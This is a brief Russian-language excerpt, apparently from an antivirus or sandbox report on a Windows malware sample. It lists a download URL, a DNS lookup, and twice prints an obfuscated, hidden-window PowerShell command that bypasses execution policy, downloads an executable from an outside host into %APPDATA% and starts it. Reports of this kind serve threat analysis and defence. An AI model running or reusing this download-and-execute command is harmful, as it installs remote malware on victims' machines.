Техническая информация
- http://real346real.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoweRSheLl.Exe -ExeCUtIONpOLiCY bYPaSs -noPROFIle -windowsTYlE HiDDEn (NEW-obJeCT SYstEm.net.WeBclieNt).downLoAdFILe('http://real346real.top/search.php','%ApPDAta%.exe');StARt-...
- DNS ASK re###46real.top
- '<SYSTEM32>\cmd.exe' /c "PoweRSheLl.Exe -ExeCUtIONpOLiCY bYPaSs -noPROFIle -windowsTYlE HiDDEn (NEW-obJeCT SYstEm.net.WeBclieNt).downLoAdFILe('http://real346real.top/search.php','%ApPDAta%.exe');StARt-...' (со скрытым окном)